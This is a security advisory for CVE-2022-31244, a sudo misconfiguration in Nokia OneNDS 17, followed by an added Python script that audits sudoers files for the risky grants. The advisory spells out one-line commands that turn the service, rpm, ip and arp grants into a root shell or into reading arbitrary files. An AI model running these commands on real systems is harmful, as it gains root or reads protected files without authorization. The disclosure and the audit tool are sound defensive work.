packetstorm | Valerio Casalino, Savino Sisco, Milena Mangiola, Giacomo Sighinolfi | PACKETSTORM:171970
Published: Apr 21, 2023 - 12:00 a.m.

Nokia OneNDS 17 Insecure Permissions / Privilege Escalation

Source: packetstormsecurity.com
Tags: nokia onends 17, insecure permissions, privilege escalation, security misconfiguration, high severity, cve-2022-31244, sudo exploitation

EPSS: 0.0004 (Low), percentile 9.1%

```
===============================================================================
title: Incorrect Permission Assignment
product: Nokia OneNDS 17
vulnerability type: Security Misconfiguration
severity: High
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
found on: 31/03/2022
by: Giacomo Sighinolfi, Milena Mangiola, Savino Sisco, Valerio Casalino
cve: CVE-2022-31244
===============================================================================

Some sudo permissions can be exploited by the users that have specific roles
to escalate to root privileges and execute arbitrary commands on the system.

The affected roles are:
ONENDS_CC_BASIC_ADMIN:
- it can run /sbin/service
- can be exploited using `sudo /sbin/service ../../bin/sh`
ONENDS_CC_SERVICE_ADMIN:
- it can run /bin/rpm
- can be exploited using `sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'`
ONENDS_CC_NETWORK_MANAGEMENT:
- it can run /sbin/ip,/sbin/arp
- can be exploited using `sudo /sbin/ip -force -batch 'file_to_read'`
- can be exploited using `sudo /sbin/arp -v -f 'file_to_read'`

===============================================================================
```
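An added example, not part of the advisory or of the product: a small sudoers audit that flags rules granting the four binaries named above with unrestricted arguments, while leaving rules pinned to a fixed argument list alone. The sudoers sample is constructed, and mapping each role to a `%group` is an assumption.

```python
import re

# Binaries the advisory shows are unsafe to grant through sudo, with its stated impact.
RISKY = {
    "/sbin/service": "service name with ../ runs another binary as root",
    "/bin/rpm": "--eval runs embedded Lua as root",
    "/sbin/ip": "-batch reads an arbitrary file as root",
    "/sbin/arp": "-f reads an arbitrary file as root",
}
SKIP = ("Defaults", "User_Alias", "Host_Alias", "Runas_Alias")

# Constructed sample; mapping each role to a %group is an assumption.
SAMPLE = r"""
Cmnd_Alias NETCMDS = /sbin/ip, /sbin/arp
%ONENDS_CC_BASIC_ADMIN ALL=(root) NOPASSWD: /sbin/service
%ONENDS_CC_SERVICE_ADMIN ALL=(root) /bin/rpm
%ONENDS_CC_NETWORK_MANAGEMENT ALL=(root) NETCMDS
%operators ALL=(root) /sbin/service ntpd status, \
    /usr/bin/uptime
"""

def audit_sudoers(text):
    """Return (principal, binary, impact) for risky binaries granted with open arguments."""
    aliases, findings = {}, []
    # Join continuation lines, then drop comments (simplified: ignores #include and \, escapes).
    for raw in re.sub(r"\\\n", " ", text).splitlines():
        line = raw.split("#", 1)[0].strip()
        alias = re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.+)", line)
        if alias:
            aliases[alias.group(1)] = [c.strip() for c in alias.group(2).split(",")]
            continue
        spec = re.match(r"(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.+)", line)
        if not spec or line.startswith(SKIP):
            continue
        for cmd in spec.group(2).split(","):
            cmd = re.sub(r"^(?:[A-Z_]+:\s*)+", "", cmd.strip())  # drop tags such as NOPASSWD:
            for entry in aliases.get(cmd, [cmd]):
                binary, _, args = entry.partition(" ")
                # No argument list in sudoers means the caller may pass any arguments.
                open_args = not args.strip() or "*" in args or "?" in args
                if binary in RISKY and open_args:
                    findings.append((spec.group(1), binary, RISKY[binary]))
    return findings

if __name__ == "__main__":
    for principal, binary, impact in audit_sudoers(SAMPLE):
        print(f"{principal}: {binary} -> {impact}")
```

The `%operators` rule is not reported because sudo only permits the exact argument list written in the rule.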
